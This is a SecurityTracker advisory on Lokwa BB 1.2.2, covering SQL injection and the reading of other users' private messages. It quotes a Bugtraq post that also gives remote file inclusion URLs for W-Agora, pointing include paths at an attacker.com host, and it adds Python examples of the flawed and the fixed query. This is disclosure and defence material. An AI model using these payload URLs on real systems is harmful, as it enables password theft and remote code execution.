SecurityTracker.com

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Lokwa BB
Vendors:   Lokwa
Lokwa BB Bulletin Board Bugs Let Remote Authenticated Users Read Private Messages and Also Execute SQL Commands on the Database
SecurityTracker Alert ID:  1004495
SecurityTracker URL:  http://securitytracker.com/id/1004495
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 9 2002
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 1.2.2
Description:   Several vulnerabilities were reported in the Lokwa BB bulletin board. A remote authenticated user can read private messages of other users and can inject SQL commands to be executed by the underlying database.

It is reported that the 'member.php' script does not validate user-supplied input in the '$member' variable, so a remote user could submit a URL containing SQL commands that the underlying database will execute.

For example, the following type of URL will result in an SQL command being executed on the server:

http://[targethost]/member.php?action=viewpro&member='%20OR%20password='PASSWORD

The command will be:

SELECT * FROM lokwa_users WHERE username='' OR password='PASSWORD'

This can be used to retrieve the passwords for all accounts on the system. The same type of exploit method can be used by a remote authenticated user to post messages and retrieve various information from the database.

A similar flaw reportedly exists in the 'misc.php' script.
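
The query construction described above, reproduced as an added example (not Lokwa BB's own code, which is PHP and is not shown in this entry) next to the parameter-bound form that closes the hole. Only the 'lokwa_users' table name and the 'username', 'password' and 'status' columns come from this entry and the source message; the sample rows, function names and the use of SQLite are assumptions.

```python
import sqlite3
from urllib.parse import parse_qs

# Constructed sample data. Plain-text passwords mirror the advisory's
# premise that the password column can be matched against a literal.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE lokwa_users (username TEXT, password TEXT, status TEXT)")
    db.executemany("INSERT INTO lokwa_users VALUES (?, ?, ?)", [
        ("alice", "PASSWORD", "Administrator"),
        ("bob", "hunter2", "Member"),
    ])
    return db

def member_param(query_string):
    # Decode the 'member' parameter the way the web server would.
    return parse_qs(query_string, keep_blank_values=True)["member"][0]

def build_query_concat(member):
    # Flawed pattern: the request value is pasted into the SQL text.
    return "SELECT * FROM lokwa_users WHERE username='" + member + "'"

def lookup_concat(db, member):
    return db.execute(build_query_concat(member)).fetchall()

def lookup_bound(db, member):
    # Hardened pattern: the value is bound as data and never parsed as SQL.
    return db.execute(
        "SELECT * FROM lokwa_users WHERE username=?", (member,)).fetchall()

# Query string from the advisory's example URL.
ADVISORY_QS = "action=viewpro&member='%20OR%20password='PASSWORD"

if __name__ == "__main__":
    db = make_db()
    m = member_param(ADVISORY_QS)
    print(build_query_concat(m))
    print("concatenated:", lookup_concat(db, m))
    print("bound:       ", lookup_bound(db, m))
```

With the bound query the whole parameter is compared to 'username' as a single string, so the request matches no row.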

It is reported that when a user responds to a message, the 'pm.php' script does not verify that the message being replied to was actually sent to the user who is replying. A remote user can submit the following type of URL to view message #1, regardless of whether message #1 was originally addressed to that user.

http://www.victim.com/pm.php?action=reply&pmid=1
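
The missing ownership check described above, as an added example (not Lokwa BB's own code). The entry names only 'pm.php' and the 'pmid' parameter, so the table, column and function names and the sample rows are hypothetical.

```python
import sqlite3

# Constructed schema and rows; names are hypothetical.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE private_messages "
        "(pmid INTEGER PRIMARY KEY, sender TEXT, recipient TEXT, body TEXT)")
    db.executemany("INSERT INTO private_messages VALUES (?, ?, ?, ?)", [
        (1, "bob", "alice", "meet at noon"),
        (2, "alice", "carol", "draft attached"),
    ])
    return db

def reply_quote_unchecked(db, pmid):
    # Flawed pattern: any logged-in user gets whatever message pmid names.
    row = db.execute(
        "SELECT body FROM private_messages WHERE pmid=?", (pmid,)).fetchone()
    return row[0] if row else None

def reply_quote_checked(db, pmid, session_user):
    # Hardened pattern: the row must also be addressed to the session user.
    # session_user must come from the server-side session, not the request.
    row = db.execute(
        "SELECT body FROM private_messages WHERE pmid=? AND recipient=?",
        (pmid, session_user)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    print("unchecked, as carol:", reply_quote_unchecked(db, 1))
    print("checked, as carol:  ", reply_quote_checked(db, 1, "carol"))
    print("checked, as alice:  ", reply_quote_checked(db, 1, "alice"))
```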

The original advisory is available (in French) at:

http://www.ifrance.com/kitetoua/tuto/LokwaBB.txt

Impact:   A remote user can execute arbitrary SQL commands on the database. This allows the remote user to view passwords and other information for users on the bulletin board.

A remote user can also view private messages belonging to other users.

Solution:   No solution was available at the time of this entry.
Vendor URL:  lokwa.farcom.com/
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Security holes in LokwaBB and W-Agora


Somebody advised me to post also on bugtraq not only on vuln-dev, I thus do 
it :)  I just hope that doesn't give more work to the webmasters.

Product 1 :
***********
W-Agora 4.1.3
http://www.w-agora.net

Problem :
- Including file

Exploits :
- With a file http://www.attacker.com/dbaccess.txt :
http://[target]/include/oci8.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/postgres65.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/mysql.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/mssql7.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/msql.php?inc_dir=http://www.attacker.com&ext=txt

- With a file http://www.attacker.com/postgres65.txt :
http://[target]/include/postgres.php?inc_dir=http://www.attacker.com&ext=txt

- With the file http://www.attacker.com/auth.txt :
http://[target]/user/agora_user.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/user/ldap_example.php?inc_dir=http://www.attacker.com&ext=txt

More details in French :
http://www.ifrance.com/kitetoua/tuto/W-Agora.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FW-Agora.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools

Product 2 :
***********
LokwaBB 1.2.2
http://lokwa.farcom.com/

Problems :
- XSS
- Private messages reading
- SQL Injection

Exploits :
- http://[target]/member.php?action=viewpro&member='%20OR%20password='PASSWORD
- http://[target]/member.php?action=viewpro&member='%20OR%20status='Administrator
- misc.php?action=forgot&send=yes&loser='%20OR%20password='PASSWORD
- http://[target]/pm.php?action=reply&pmid=[MESSAGE ID]

More details in French :
http://www.ifrance.com/kitetoua/tuto/LokwaBB.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FLokwaBB.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools



Sorry for my poor English :)
frog-m@n




 
 



Copyright 2019, SecurityGlobal.net LLC